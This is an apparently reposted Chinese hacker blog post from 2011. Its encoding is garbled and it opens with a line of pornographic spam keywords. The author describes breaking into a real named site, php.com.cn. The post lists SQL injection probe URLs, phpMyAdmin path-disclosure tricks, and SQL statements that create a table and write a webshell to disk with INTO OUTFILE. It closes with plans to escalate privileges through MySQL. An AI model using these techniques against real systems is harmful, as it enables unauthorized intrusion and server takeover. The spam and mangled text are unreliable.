国产精品香蕉在线观看网,亚洲欧美精品综合在线观看,亚洲不卡av一区二区无码不卡,亚洲日本精品国产第一区二区

移動(dòng)安全 安全管理 應(yīng)用案例網(wǎng)絡(luò)威脅 系統(tǒng)安全 應(yīng)用安全 數(shù)據(jù)安全 云安全
當(dāng)前位置: 主頁 > 信息安全 > 網(wǎng)絡(luò)威脅 >

“黑”吃“黑”黑客是怎樣黑了落伍者

時(shí)間:2011-05-03 15:15來源: 點(diǎn)擊:
前天,聽說落伍分類信息程序發(fā)布了,就想前去看看,什么樣子的。一看,真不愧是落伍的產(chǎn)品,風(fēng)格依然落伍,功能還行,大體一看沒什么漏洞。
Tags漏洞(188)落伍(7)  

  前天,聽說落伍分類信息程序發(fā)布了,就想前去看看,什么樣子的。一看,真不愧是落伍的產(chǎn)品,風(fēng)格依然落伍,功能還行,大體一看沒什么漏洞。

  看看吧。ping demo.im286.com返回IP 58.253.71.241打開是個(gè)"Directory Listing Denied",沒意思。不喜歡。

  再看看開發(fā)者的站,http://www.php.com.cn/,真不錯(cuò),ping一下吧。返回Pingingphper.xihuidc.com.cn[58.253.71.241],看出門道來了,CNAME啊。而且一看域名xihuidc,這個(gè)IDC有點(diǎn)2.CNAME的確便于管理,但是這樣不太好。

  ping的同時(shí)我也打開了php.com.cn的站點(diǎn),喲,"Powered by ebcms",先來檢測下注入吧。

  http://www.php.com.cn/?do=index&cid=3'

  http://www.php.com.cn/?do=news&id=4'

  這兩個(gè)豬點(diǎn)不僅出錯(cuò)了,而且返回了物理地址。 http://www.php.com.cn/?do=index&cid=3'

  http://www.php.com.cn/?do=news&id=4'

  D:\public_html\php.com.cn\wwwroot\libraries\syslib\drivers\driver.mysql.php

  (這個(gè)地址很重要哦)

  本來想,有豬點(diǎn),射管理員密碼出來,進(jìn)后臺(tái)不就得了嗎,讀出密碼一看,傻眼了。crypt加密的,DZ那邊的數(shù)據(jù)也讀出來了。魚也夠BT的,密碼暴不出來,而且只登錄過一次……(這個(gè)也很重要,細(xì)節(jié)。)

  因?yàn)樵跈z測的時(shí)候發(fā)現(xiàn)是mysql的root,直接找工具pangolin,讀文件吧,怎么讀文件也是很有技巧的,這里不多說,讀到setting.php,終于讀到root的密碼了。

  現(xiàn)在就開始猜phpmyadmin的路徑了,這個(gè)倒是很順利。 http://phper.xihuidc.com.cn/phpmyadmin/,

  http://www.php.com.cn/?do=index&cid=3'

  http://www.php.com.cn/?do=news&id=4'

  然后就很簡單了。暴路徑,暴路徑我給大家?guī)讉€(gè)辦法: phpMyAdmin/libraries/select_lang.lib.php

  phpMyAdmin/darkblue_orange/layout.inc.phpphpMyAdmin/index.php?lang[]=1

  路徑出來了。E:\phpMyadmin\phpmyadmin\libraries\select_lang.lib.php

  -------------------------------分頁欄-------------------------------

  寫個(gè)shell進(jìn)去。

  Create TABLE tmdsb(shell text NOT NULL);

  Insert INTO tmdsb (shell) VALUES('test');

  select shell from tmdsb into outfile 'E:\phpMyadmin\phpmyadmin\libraries\php.php';

  Drop TABLE tmdsb;

  有個(gè)小馬就好辦了,再傳個(gè)大馬進(jìn)去。發(fā)現(xiàn)每個(gè)根目錄都不能瀏覽,甚至跳到D:\public_html\php.com.cn\wwwroot\這里也跳不過去,只能在phpmyadmin的目錄溜達(dá),這里表揚(yáng)下IDC,做的不錯(cuò)。看看C:\Progra~1,沒有SERV-U,不能用Serv-U提權(quán)了,上傳一個(gè)su.php,由于MYSQL是以系統(tǒng)權(quán)限安裝的,(在WINDOWS服務(wù)管理里面可以看到,是以服務(wù)加載的)所以,這里我考慮用MYSQL提權(quán),如圖:

  (這個(gè)shell里的我給拼錯(cuò)了,select和cmdshell,直接導(dǎo)致我以為服務(wù)器net.exe做了限制……其實(shí)沒有……)

------分隔線----------------------------

推薦內(nèi)容